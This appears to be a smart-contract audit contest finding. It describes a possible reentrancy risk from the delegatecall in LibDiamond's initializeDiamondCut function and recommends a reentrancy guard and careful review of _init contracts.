The initializeDiamondCut
function in the LibDiamond
library uses delegatecall
to execute initialization code on a target contract (_init
). This introduces a potential reentrancy vulnerability if the target contract is malicious, allowing it to reenter the diamond during initialization.
The initializeDiamondCut
function is an internal function within LibDiamond, making it accessible to any contract inheriting from the library.
The function utilizes delegatecall
to execute the initialization code specified in the _calldata
on the _init
contract.
If the _init
contract is malicious, it could reenter the diamond contract during the execution of delegatecall
, potentially manipulating the diamond's state before it is fully initialized.
A successful exploitation of this reentrancy vulnerability could lead to:
Incorrect State Variables: The attacker could manipulate the diamond's state variables before they are finalized, leading to unexpected and potentially harmful behavior.
Unauthorized Access: The attacker could gain unauthorized access to sensitive functions or data within the diamond contract.
Denial of Service: The diamond contract could be rendered unusable due to the corrupted state.
Manual Code Review
Reentrancy Guard: Implement a reentrancy guard pattern in the initializeDiamondCut
function. A simple boolean flag can be used to prevent the function from being called recursively during its execution.
Careful Review of _init
Contracts: Thoroughly audit any contract passed as the _init
argument to ensure it does not contain any malicious code or reentrancy vulnerabilities.
The contest is live. Earn rewards by submitting a finding.
This is your time to appeal against judgements on your submissions.
Appeals are being carefully reviewed by our judges.